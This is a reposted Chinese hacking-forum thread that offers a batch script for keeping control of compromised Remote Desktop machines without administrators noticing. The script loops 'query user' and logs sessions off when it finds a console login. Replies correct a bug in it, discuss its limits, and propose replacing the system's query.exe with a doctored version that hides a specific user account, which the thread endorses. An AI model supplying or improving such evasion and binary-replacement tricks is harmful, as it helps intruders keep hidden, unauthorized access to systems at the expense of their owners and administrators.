[转载]在管理员的眼皮子底下溜走
文章作者:cnbird [url]http://cnbird.99blog.com/[/url]相信大家一定有自己的3389的肉机,可是你有没有想过,当你再登陆的时候也许管理员也再线呢?
如果是一个懂黑客技术的网管一定会用query user来察看终端登陆的用户,这样的话你的登陆就会暴露给管理员了,估计这样的话你的肉机用的时间也长不了了,今天无意见学习dos下的编程,想到了一个程序可以很方便的再管理员的眼皮底下溜走,下面给出这个程序
---------------------------------------cut here----------------------------
:begin
query user|fine "console"
if errorlevel 1 logoff 1&&logoff 2
goto begin
-----------------------------------cut here----------------------------------
程序的原理很简单,就是只要有人用query user的时候就执行logoff,logoff的意思就是注销这个回话,当然管理员也就不会知道你登陆了,
查点忘记了,这个程序只要保存成.bat就行了,登陆一次执行一次。。。
祝咱们的3389肉机用的时间更长^_^
88 很经典,也很简练的一个代码,注销这个回话,那你的意思就是注销????
那我要是正在弄什么东西,我应该这么办?也就是说我需要重新做!! 有点bug
query user|fine "console"
应该是 find "console"
有个问题.这个是BAT,不是service
不可能监控系统.
只是每次执行的时候看看有没有用户通过控制台登陆.
所以以下功能
>>就是只要有人用query user的时候就执行logoff
是没法达到的.
他没有监控别人使用query user
而是自己query user
检测到有用户通过console登陆
就主动logoff出来
应该是加载在自己这个用户的登陆运行脚本里面使用.
还有一个问题
RADMIN之类的远程工具.在query出来都是通过console方式登陆的.
所以万一别人使用RADMIN之类远程登陆又不退出.
那么你这个用户就可能永远也登陆不进去了. 可能是原作者对于代码的理解有了偏差.
引申一下原作者想达到的目的.
做个简单的替换可能更方便.
直接写个QUERY命令的替换
query.exe位于system32下
用自己的程序替换一下.
每次管理员query的时候.
不显示特定用户.嘿嘿... 代码罐头 最后这个提议好,把query.exe改了,就不用那么麻烦啦
页:
[1]